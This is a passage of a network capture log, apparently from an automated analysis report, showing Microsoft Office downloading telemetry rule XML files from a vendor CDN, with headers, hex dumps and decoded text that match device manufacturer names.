                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:27 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:27 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 415
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                              ETag: "0x8DC582B9F6F3512"
                                                                              x-ms-request-id: f6ec459e-801e-00a0-7849-272196000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064927Z-16849878b785dznd7xpawq9gcn0000000350000000000xua
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:27 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              31192.168.2.44978513.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:27 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:27 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:27 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 471
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                              ETag: "0x8DC582BB10C598B"
                                                                              x-ms-request-id: a881b062-301e-0020-4af0-266299000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064927Z-15b8d89586f2hk28h0h6zye26c000000044g0000000050sh
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:27 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              32192.168.2.44978313.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:27 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:27 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:27 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 474
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                              ETag: "0x8DC582B9964B277"
                                                                              x-ms-request-id: 0c5ae494-501e-0029-6ca4-26d0b8000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064927Z-16849878b78hh85qc40uyr8sc800000001vg00000000k9df
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:27 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              33192.168.2.44978613.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:27 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:27 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:27 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 632
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                              ETag: "0x8DC582BB6E3779E"
                                                                              x-ms-request-id: 1f7bc680-101e-0065-6904-274088000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064927Z-16849878b785jrf8dn0d2rczaw00000002wg000000003dxp
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:27 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              34192.168.2.44978713.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:27 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:27 UTC498INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:27 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 467
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                              ETag: "0x8DC582BA6C038BC"
                                                                              x-ms-request-id: 0d0c59f1-101e-005a-526a-27882b000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064927Z-17c5cb586f6f8m6jnehy0z65x400000000zg000000002rgc
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L2_T2
                                                                              X-Cache: TCP_REMOTE_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:27 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              35192.168.2.44978813.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:28 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:28 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:28 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 407
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                              ETag: "0x8DC582BBAD04B7B"
                                                                              x-ms-request-id: 3c9c0adf-d01e-0028-0c96-257896000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064928Z-16849878b786fl7gm2qg4r5y7000000001zg0000000051wm
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:28 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              36192.168.2.44978913.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:28 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:28 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:28 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 486
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                              ETag: "0x8DC582BB344914B"
                                                                              x-ms-request-id: 8384fc49-f01e-00aa-06d4-268521000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064928Z-17c5cb586f6mkpfk79wxvcahc000000001z000000000c8ev
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              37192.168.2.44979013.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:28 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:28 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:28 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 427
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                              ETag: "0x8DC582BA310DA18"
                                                                              x-ms-request-id: 8b699d26-501e-005b-1a2a-27d7f7000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064928Z-17c5cb586f6wmhkn5q6fu8c5ss00000000wg00000000cm1x
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              38192.168.2.44979213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:28 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:28 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:28 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 407
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                              ETag: "0x8DC582B9698189B"
                                                                              x-ms-request-id: 30dbe6fd-101e-0034-66db-2696ff000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064928Z-17c5cb586f6lxnvg801rcb3n8n00000001bg000000008aa8
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:28 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              39192.168.2.44979113.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:28 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:28 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:28 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 486
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                              ETag: "0x8DC582B9018290B"
                                                                              x-ms-request-id: c8022c20-501e-00a3-08ae-26c0f2000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064928Z-16849878b785dznd7xpawq9gcn000000035g0000000000c5
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              40192.168.2.44979413.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:29 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:29 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:29 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 415
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                              ETag: "0x8DC582BA41997E3"
                                                                              x-ms-request-id: a32196a2-e01e-0051-3ed7-2684b2000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064929Z-r197bdfb6b4d9xksru4x6qbqr000000001ng000000004q4z
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:29 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


